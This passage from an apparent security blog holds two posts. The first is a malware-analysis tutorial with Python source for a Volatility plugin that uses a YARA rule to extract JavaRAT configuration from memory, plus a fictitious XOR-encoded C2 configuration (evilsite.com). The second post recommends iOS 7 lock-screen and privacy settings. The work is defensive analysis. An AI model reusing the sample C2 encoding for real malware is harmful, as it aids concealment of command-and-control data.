0x2ab9a804  6f 73 3d 77 69 6e 20 6d 61 63 53 50 4c 49 54 01   os=win.macSPLIT.
0x2ab9a814  6d 70 6f 72 74 3d 2d 31 53 50 4c 49 54 03 03 03   mport=-1SPLIT...
0x2ab9a824  70 65 72 6d 73 3d 2d 31 53 50 4c 49 54 03 03 03   perms=-1SPLIT...

One interesting side effect to working within a VM is that some data may appear under the space of VMWareUser.exe. The data is showing up somewhere outside of the context of our configuration. We could try to change our rule, but the simpler solution within the plugin is to just rule out hits from VMWareUser.exe and only allow hits from executables that contain "java".

Now that we have a rule, how do we automate this? By writing a quick and dirty plugin for Volatility.

Creating a Plugin

A quick plugin that I'm demonstrating is composed of two primary components: a YARA rule, and a configuration dumper. The configuration dumper scans memory for the YARA rule, reads memory, and displays the parsed results. An entire post could be written on just this file format, so instead I'll post a very generic plugin and highlight what should be modified. I wrote this based on the two existing malware dumpers already released with Volatility: Zeus and Poison Ivy.

Jamie Levy and Michael Ligh, both core developers on Volatility, provided some critical input on ways to improve and clean up the code.

# JavaRAT detection and analysis for Volatility - v 1.0
# This version is limited to JavaRAT's clients 3.0 and 3.1, and maybe others 
# Author: Brian Baskin <brian@thebaskins.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details. 
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 

import volatility.plugins.taskmods as taskmods
import volatility.win32.tasks as tasks
import volatility.utils as utils
import volatility.debug as debug
import volatility.plugins.malware.malfind as malfind
import volatility.conf as conf
import string

try:
    import yara
    has_yara = True
except ImportError:
    has_yara = False


signatures = {
    'javarat_conf' : 'rule javarat_conf {strings: $a = /port=[0-9]{1,5}SPLIT/ condition: $a}'
}

config = conf.ConfObject()
config.add_option('CONFSIZE', short_option = 'C', default = 256,
                           help = 'Config data size',
                           action = 'store', type = 'int')
config.add_option('YARAOFFSET', short_option = 'Y', default = 0,
                           help = 'YARA start offset',
                           action = 'store', type = 'int')

class JavaRATScan(taskmods.PSList):
    """ Extract JavaRAT Configuration from Java processes """

    def get_vad_base(self, task, address):
        for vad in task.VadRoot.traverse():
            if address >= vad.Start and address < vad.End:
                return vad.Start
        return None

    def calculate(self):
        """ Required: Runs YARA search to find hits """ 
        if not has_yara:
            debug.error('Yara must be installed for this plugin')

        addr_space = utils.load_as(self._config)
        rules = yara.compile(sources = signatures)
        for task in self.filter_tasks(tasks.pslist(addr_space)):
            if 'vmwareuser.exe' == task.ImageFileName.lower():
                continue
            if not 'java' in task.ImageFileName.lower():
                continue
            scanner = malfind.VadYaraScanner(task = task, rules = rules)
            for hit, address in scanner.scan():
                vad_base_addr = self.get_vad_base(task, address)
                yield task, address

    def make_printable(self, input):
        """ Optional: Remove non-printable chars from a string """
        input = input.replace('\x09', '')  # string.printable doesn't remove backspaces
        return ''.join(filter(lambda x: x in string.printable, input))

    def parse_structure(self, data):
        """ Optional: Parses the data into a list of values """
        struct = []
        items = data.split('SPLIT')
        for i in range(len(items) - 1):  # Iterate this way to ignore any slack data behind last 'SPLIT'
            item = self.make_printable(items[i])
            field, value = item.split('=')
            struct.append('%s: %s' % (field, value))
        return struct
    
    def render_text(self, outfd, data):
        """ Required: Parse data and display """
        delim = '-=' * 39 + '-'
        rules = yara.compile(sources = signatures)
        outfd.write('YARA rule: {0}\n'.format(signatures))
        outfd.write('YARA offset: {0}\n'.format(self._config.YARAOFFSET))
        outfd.write('Configuration size: {0}\n'.format(self._config.CONFSIZE))
        for task, address in data:  # iterate the yield values from calculate()
            outfd.write('{0}\n'.format(delim))
            outfd.write('Process: {0} ({1})\n\n'.format(task.ImageFileName, task.UniqueProcessId))
            proc_addr_space = task.get_process_address_space()
            conf_data = proc_addr_space.read(address + self._config.YARAOFFSET, self._config.CONFSIZE)
            config = self.parse_structure(conf_data)
            for i in config:
                outfd.write('\t{0}\n'.format(i))
This code is also available on my GitHub.

In a nutshell, you first have a signature to key on for the configuration data. This is a fully qualified YARA signature, seen as:

signatures = {
    'javarat_conf' : 'rule javarat_conf {strings: $a = /port=[0-9]{1,5}SPLIT/ condition: $a}'
}
This rule is stored in a Python dictionary format of 'rule_name' : 'rule contents'.

The plugin allows a command line argument (-Y) to set the the YARA offset. If your YARA signature hits 80 bytes past the beginning of the structure, then set this value to -80, and vice versa. This can also be hardcoded by changing the default value.

There a second command line argument (-C) to set the size of data to read for parsing. This can also be hardcoded. This will vary based upon the malware; I've seen some multiple kilobytes in size.

Rename the Class value, seen here as JavaRATScan, to whatever fits for your malware. It has to be a unique name. Additionally, the """ """ comment block below the class name contains the description which will be displayed on the command line.

I do have an optional rule to limit the search to a certain subset of processes. In this case, only processes that contain the word "java" - this is a Java-based RAT, after all. It also skips any process of "VMWareUser.exe".

The plugin contains a parse_structure routine that is fed a block of data. It then parses it into a list of items that are returned and printed to the screen (or file, or whatever output is desired). This will ultimately be unique to each malware, and the optional function of make_printable() is one I made to clean up the non-printable characters from the output, allowing me to extending the blocked keyspace.

Running the Plugin

As a rule, I place all of my Volatility plugins into their own unique directory. I then reference this upon runtime, so that my files are cleanly segregated. This is performed via the --plugins option in Volatility:
E:\Development\volatility>vol.py --plugins=..\Volatility_Plugins
After specifying a valid plugins folder, run vol.py with the -h option to ensure that your new scanner appears in the listing:
E:\Development\volatility>vol.py --plugins=..\Volatility_Plugins -h
Volatile Systems Volatility Framework 2.3_beta
Usage: Volatility - A memory forensics analysis platform.

Options:
...

        Supported Plugin Commands:

                apihooks        Detect API hooks in process and kernel memory
...
                javaratscan  Extract JavaRAT Configuration from Java processes
...
The names are automatically populated based upon your class names. The text description is automatically pulled from the "docstring", which is the comment that directly follows the class name in the plugin. 
With these in place, run your scanner and cross your fingers:

For future use, I'd recommend prepending your plugin name with a unique identifier to make it stand out, like "SOC_JavaRATScan". Prepending with a "zz_" would make the new plugins appear at the bottom of Volality's help screen. Regardless, it'll help group the built-in plugins apart from your custom ones.

The Next Challenge: Data Structures


The greater challenge is when data is read from within the executable into a data structure in memory. While the data may have a concise and structured form when stored in the file, it may be transformed into a more complex and unwieldy format once read into memory by the malware. Some samples may decrypt the data in-place, then load it into a structure. Others decrypt it on-the-fly so that it is only visible after loading into a structure.

For example, take the following fictitious C2 data stored in the overlay of an executable:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   08 A2 A0 AC B1 A0 A8 A6  AF 17 89 95 95 91 DB CE   .¢ ¬± ¨¦¯.‰••‘ÛÎ
00000016   CE 96 96 96 CF 84 97 88  8D 92 88 95 84 CF 82 8E   Ζ––Ï„—ˆ’ˆ•„Ï‚Ž
00000032   8C 03 D5 D5 D2 08 B1 A0  B2 B2 B6 AE B3 A5 05 84   Œ.ÕÕÒ.± ²²¶®³¥.„
00000048   99 95 93 80                                        ™•“€

By reversing the malware, we determine that this composed of Pascal-strings XOR encoded by 0xE1. Pascal-string are length prefixed, so applying the correct decoding would result in:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   08 43 41 4D 50 41 49 47  4E 17 68 74 74 70 3A 2F   .CAMPAIGN.http:/
00000016   2F 77 77 77 2E 65 76 69  6C 73 69 74 65 2E 63 6F   /www.evilsite.co
00000032   6D 03 34 34 33 08 50 41  53 53 57 4F 52 44 05 65   m.443.PASSWORD.e
00000048   78 74 72 61                                        xtra

This is a very simple encoding routine, which I made with just:

items = ['CAMPAIGN', 'http://www.evilsite.com', '443', 'PASSWORD', 'extra']
data = ''
for i in items:
    data += chr(len(i))
    for x in i: data += chr(ord(x) ^ 0xE1)


Data structures are a subtle and difficult component of reverse engineering, and vary in complexity with the skill of the malware author. Unfortunately, data structures are some of the least shared indicators in the industry.

Once completed, a sample structure could appear similar to the following:

struct Configuration
{
    CHAR campaign_id[12];
    CHAR password[16];
    DWORD heartbeat_interval;
    CHAR C2_domain[48];
    DWORD C2_port;
}

With this structure, and the data shown above, the malware reads each variable in and applies it to the structure. But, we can already see some discrepancies: the items are in a differing order, and some are of a different type. While the C2 port is seen as a string, '443', in the file, it appears as a DWORD once read into memory. That means that we'll be searching for 0x01BB (or 0xBB01 based on endianness) instead of '443'. Additionally, there are other values introduced that did not exist statically within the file to contend with.

An additional challenge is that depending on how the memory was allocated, there could be slack data found within the data. This could be seen if the malware sample allocates memory malloc() without a memset(), or by not using calloc().

When read and applied to the structure, this data may appear as the following:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   43 41 4D 50 41 49 47 4E  00 0C 0C 00 00 50 41 53   CAMPAIGN.....PAS
00000016   53 57 4F 52 44 00 00 00  00 00 00 00 00 00 17 70   SWORD..........p
00000032   68 74 74 70 3A 2F 2F 77  77 77 2E 65 76 69 6C 73   http://www.evils
00000048   69 74 65 2E 63 6F 6D 00  00 00 00 00 00 00 00 00   ite.com.........
00000064   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000080   00 00 01 BB                                        ...»

We can see from this that our strategy changes considerably when writing a configuration dumper. The dumper won't be written based upon the structure in the file, but instead upon the data structure in memory, after it has been converted and formatted. We'll have to change our parser slightly to account for this. For example, if you know that the Campaign ID is 12 bytes, then read 12 bytes of data and find the null terminator to pull the actual string.

This just scratches the surface of what you can do with encrypted data in memory, but I hope it can inspire others to use this template code to make quick and easy configuration dumpers to improve their malware analysis.

iOS 7 Security Settings and Recommendations

By Kunjan Shah.

Apple finally released the much anticipated iOS 7 last Wednesday, September 18th. A lot of people are rushing in and updating to this latest version. It hit 18% adoption in just 24 hours after its release. I gotta admit, I love the look and feel of it and it feels like a completely new phone in my hand. In this blog post I have tried to explain some of the new and modified security settings, features that you should be aware of before you move to iOS 7.

Recent Hacks

iOS 7 Lock Screen Bypass Flaw

Just one day after its release, iOS 7 lock bypass flaw was identified by a user as show in this video. I tried it out on my iPhone 5 running iOS 7 and it is a fairly simple trick. This was followed by a similar flaw that was identified in the beta version of iOS7 sometime back. May be a good reason to not jump to iOS 7 right away? Until an official fix is released by Apple you can disable access to the Control Center from locked screen as discussed below.

Yet another bug allows an attacker the ability to bypass the lock screen and make calls.

Siri Abuse to Post Facebook Updates

Siri gains more power in iOS 7, maybe too much power. This vulnerability identified that while certain Siri commands are restricted (disallowing the user to post to facebook) there are alternate commands that accomplish the same task but are unrestricted.

Apple TouchID Bypass and Drama

Latest iPhone models include a fingerprint reader called the TouchID. The intention behind this addition was in the right place, but as shown by the CCC, fingerprints should not be used as a security identifier. Hacking the TouchID got tons of attention from security community due to a crowd funding venture, however it appears that a fraudster named Arturas Rosenbacher took much of the credit for the venture, made false promises, and never paid up, creating a little drama in the industry.

Notification Center

Notification center which was first introduced with iOS 5 gets a facelift with iOS 7. One of the key security distinction this time around is that you can access the notification center now from a locked screen. Notification center is a hub of information ranging from calendar, reminders, stocks, missed calls, messages etc. Unless you have a very good reason to keep it accessible from the locked screen I recommend disabling it. To disable it navigate to Settings > Notification Center. Toggle “Notification View” and “Today View” to off as shown below.



Control Center

With iOS 7 Apple has introduced Control Center, which lets you access frequently accessed settings by swiping up from the bottom of the screen. This feature, similar to the Notification Center, is accessible from the locked screen by default. It lets you modify settings such as Wi-Fi, Bluetooth, Airplane Mode, Airdrop etc. Again, it is recommended that you disable this feature from the locked screen. As shown in this video, having control center accessible from the locked device can let anyone in possession of your iPhone bypass the lock screen completely. This is another very good reason to disable access to it from the locked screen.

You can disable it from under Settings > Control Center. Toggle “Access on Lock Screen” to off as shown in the figure below.



Airdrop

With OS X Lion Apple introduced a new peer-to-peer file sharing feature called Airdrop for the Mac users. This feature is now also made available to the iOS 7 users using iPhone 5 models. This feature lets you transfer maps, pictures, videos using Wi-Fi and Bluetooth to other users in close proximity. One of the settings for Airdrop is that it lets you choose whether your iPhone can be discoverable by everyone or just your contacts. It is recommended that you select “Contacts Only” as it is a safer alternative than “Everyone”, unless you want to receive file sharing requests from anonymous people around you.



Powerful New Siri

iOS 7 introduces a powerful version of Siri with additional commands that lets you change settings on the fly from locked screen such as “Enable Bluetooth”, “Turn on Airplane Mode”. You can also find recent tweets, post on Facebook, read and reply to new messages, view missed calls, and listen to voice messages etc. from the locked screen using Siri.



It is recommended that you disable access to Siri from a locked screen. To do so, go to Settings > General > Passcode Lock and disable Siri and other settings as shown in the figure below.



Activation Lock

This is one of the nicest security feature that Apple has introduced with iOS 7. In an attempt to prevent thieves from reselling stolen iPhones by just resetting them and swapping the SIM card; Apple introduced this feature called “Activation Lock” to augment its Find My iPhone service. This feature prevents someone to erase all the data and re-activate the device, or turn find my iPhone off without entering the Apple id and the password first. When you first upgrade to iOS 7 Apple asks for your Apple id to enable this feature. To enable it at a later stage simply go to Settings > iCloud > Toggle Find my iPhone setting to on. To read more about this topic, visit this post.



Privacy Controls in iOS 7

Microphone (New Feature)

iOS 7 now asks for user’s permission if an application intends to access the microphone. In the previous versions of iOS permissions were limited to contacts, calendars, photos etc. This is a new and nice privacy control. You can see which apps have been authorized to access the microphone and revoke access by going to Settings > Privacy > Microphone.



Private Browsing Button (Re-designed)

The “Private” browsing setting has been moved out from the “Settings” and now more easily available within Safari. You can easily enable “Private” browsing by navigating to bookmarks in Safari and tapping on the “Private” button on the bottom left corner. Moreover, you can also disable all tracking by going to Settings > Safari and turning “Do Not Track” button to off.



Limit Ad Tracking (Re-designed)

This feature lets you limit ad tracking and reset your device’s “Advertising Identifier”. This prevents companies from sending you targeted advertisements through a unique tracking number tied to your device. To enable this option go to Settings > Privacy > Limit Ad Tracking and turn it on as shown below.



Frequent Locations

When you first upgrade to iOS 7 it asks you if you want to remember places that you frequently visit. If you opt-in, frequent locations setting saves this information and transmits it anonymously to Apple to improve Maps. There is no surprise here that iPhone keeps track of places you frequently visit, if you followed the Location-gate fiasco that unveiled in 2011, when a database of Wi-Fi hotspots was discovered on the iOS 4 devices. However, now apple is being more transparent about it and provides an option for users to opt-in. Good thing is this is turned off by default in iOS 7. It is no longer a developer-only setting, but a consumer feature according to Apple. If you opt-in by mistake and want to opt out then go to Settings > Privacy > Location Services > Scroll down to System Services at the bottom of the screen > Toggle Frequent Locations to off.

In addition to this, I recommend turning off the “Diagnostics & Usage” and “Location-Based iAds” settings as well. Diagnostics & Usage setting monitors what you do on your device and anonymously sends it to Apple for improving iOS. iAds caused a lot of noise in 2010 when Apple published its long privacy policy. Bottom line is if you don’t care about targeted ads you should probably disable this.



Blocking Contacts (New Feature)

With iOS 7 now you have the ability to block contacts for phone calls, iMessages and FaceTime. To block someone go to Settings > Messages or FaceTime and scroll down to “Blocked”. From here you will be able to add contacts that you want blocked as shown below.



References

  1. http://www.macworld.com/article/2048738/get-to-know-ios-7-changes-in-the-settings-app.html
  2. http://blogs.wsj.com/digits/2013/09/18/how-to-use-apples-new-ios-7-privacy-controls/
  3. http://www.pcmag.com/article2/0,2817,2423635,00.asp
  4. http://www.buzzfeed.com/charliewarzel/this-is-what-it-looks-like-when-your-phone-tracks-your-every
  5. http://resources.infosecinstitute.com/ios-application-security-part-6-new-security-features-in-ios-7/
  6. http://www.idownloadblog.com/2013/08/08/a-closer-look-at-frequent-locations-in-ios-7/